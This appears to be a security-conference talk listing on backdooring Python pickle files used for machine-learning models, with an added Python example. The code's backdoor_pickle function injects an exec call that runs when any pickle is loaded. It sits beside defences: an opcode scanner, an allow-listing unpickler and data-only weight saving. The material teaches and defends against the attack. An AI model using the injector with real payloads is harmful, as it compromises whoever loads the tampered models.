ColdwaterQ - Backdooring Pickles: A decade only made things worse
ColdwaterQ, Senior Security Engineer at Nvidia, He/Him
Presentation Title: Backdooring Pickles: A decade only made things worse
Length of presentation: 20 minutes
Demo, Tool
ABSTRACT
Eleven years ago, "Sour Pickles" was presented by Marco Slaviero. The Python docs already said pickles were insecure at that time, but since then machine learning frameworks have started saving models in pickled formats as well. So, I will show how simple it is to add a backdoor into any pickled object, using machine learning models as an example, as well as an example of how to securely save a model to prevent malicious code from being injected into it.
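As an added illustration of the two halves of the abstract (not the speaker's demo code, and not any of the tools in the references), the block below injects a payload into an existing pickle stream without touching the original opcodes, then shows three things a defender can do about it: scan the opcodes without loading, load through an allow-listing Unpickler, and save weights in a data-only format. The "model" is a constructed dict of floats standing in for real weights, the payload deliberately only sets an environment variable so its execution is observable, and every function name here (backdoor_pickle, suspicious_opcodes, RestrictedUnpickler, safe_loads, save_weights, load_weights, run_demo) is this example's own.

```python
import io
import json
import os
import pickle
import pickletools

# Constructed sample "model". A real framework pickles tensors instead, but the
# injection below never reads the original opcodes, so it works on any stream.
BENIGN_MODEL = {"layer1.weight": [0.1, 0.2, 0.3], "layer1.bias": [0.0]}


def backdoor_pickle(data: bytes, module: str, name: str, arg: str) -> bytes:
    """Return a copy of `data` that calls module.name(arg) when unpickled.

    The injected opcodes run first and their result is POPped off the stack,
    so the loader still receives the original object and sees nothing odd.
    """
    proto = data[1] if data[:1] == pickle.PROTO else 2
    arg_bytes = arg.encode("utf-8")
    payload = (
        pickle.PROTO + bytes([max(proto, 2)])             # protocol header
        + pickle.GLOBAL + f"{module}\n{name}\n".encode()   # push module.name
        + pickle.BINUNICODE + len(arg_bytes).to_bytes(4, "little") + arg_bytes
        + pickle.TUPLE1                                     # (arg,)
        + pickle.REDUCE                                     # module.name(*args)
        + pickle.POP                                        # discard the result
    )
    if data[:1] == pickle.PROTO:
        data = data[2:]  # drop the original header; ours is already in place
    return payload + data


# Opcodes that import or call code. Benign framework pickles use some of these
# legitimately, so treat the output as input to an allowlist, not a verdict.
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
              "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def suspicious_opcodes(data: bytes) -> list:
    """List (opcode, argument) pairs that can execute code, without loading."""
    return [(op.name, arg) for op, arg, _pos in pickletools.genops(data)
            if op.name in SUSPICIOUS]


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only (module, name) pairs on an explicit allowlist; this is the
    pattern from the pickle documentation, with the allowlist passed in."""

    def __init__(self, file, allowed):
        super().__init__(file)
        self._allowed = allowed

    def find_class(self, module, name):
        if (module, name) in self._allowed:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused to import {module}.{name}")


def safe_loads(data: bytes, allowed=frozenset()):
    return RestrictedUnpickler(io.BytesIO(data), allowed).load()


def save_weights(model: dict) -> bytes:
    """Data-only serialisation: JSON cannot name a callable, so an injected
    payload has nothing to hook. Validate the shape again on load."""
    return json.dumps(model, sort_keys=True).encode()


def load_weights(blob: bytes) -> dict:
    model = json.loads(blob)
    ok = isinstance(model, dict) and all(
        isinstance(k, str) and isinstance(v, list) and all(isinstance(x, float) for x in v)
        for k, v in model.items())
    if not ok:
        raise ValueError("weights must be a dict of str -> list[float]")
    return model


def run_demo() -> dict:
    """Exercise the attack and each defence; returns the observations."""
    benign = pickle.dumps(BENIGN_MODEL, protocol=2)
    bad = backdoor_pickle(benign, "builtins", "exec",
                          "import os; os.environ['PICKLE_BACKDOOR'] = '1'")
    os.environ.pop("PICKLE_BACKDOOR", None)
    result = {
        "benign_scan": [n for n, _ in suspicious_opcodes(benign)],
        "bad_scan": [n for n, _ in suspicious_opcodes(bad)],
        # plain pickle.loads returns the untouched model, and the payload runs
        "loads_returns_model": pickle.loads(bad) == BENIGN_MODEL,
        "payload_ran": os.environ.get("PICKLE_BACKDOOR") == "1",
    }
    try:
        safe_loads(bad)
        result["restricted_blocked"] = False
    except pickle.UnpicklingError:
        result["restricted_blocked"] = True
    result["restricted_loads_benign"] = safe_loads(benign) == BENIGN_MODEL
    result["json_roundtrip"] = load_weights(save_weights(BENIGN_MODEL)) == BENIGN_MODEL
    return result


if __name__ == "__main__":
    pickletools.dis(backdoor_pickle(pickle.dumps(BENIGN_MODEL, protocol=2),
                                    "builtins", "exec", "print('hello')"))
    print(run_demo())
```

Two practical caveats. Framework checkpoints such as torch.save output legitimately contain GLOBAL and REDUCE opcodes to rebuild tensors, so the scanner and the RestrictedUnpickler only work once you have enumerated the module/name pairs a clean checkpoint of your own needs; anything outside that set is the finding. And the "secure save" is not a smarter loader but a format that cannot carry code at all; the JSON helper here is the toy version of what safetensors does for tensors.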
SPEAKER BIO(S)
ColdwaterQ has always been interested in understanding how things work. This led to a career in the security industry and allowed him to be a part of NVIDIA's AI Red Team, where he currently works. He has attended every DEF CON starting in 2012, even if the last two were only remote, and has returned this year hoping to give some of what he learned back to the community.
https://coldwaterq.com
@ColdwaterQ
REFERENCES:
BlackHat 2011 - "Sour Pickles, A serialised exploitation guide in one part" by Marco Slaviero
https://github.com/trailofbits/fickling
https://docs.python.org/3/library/pickletools.html
https://github.com/python/cpython/bl...pickletools.py
https://github.com/alkaet/LobotoMl/t..._runtime_hacks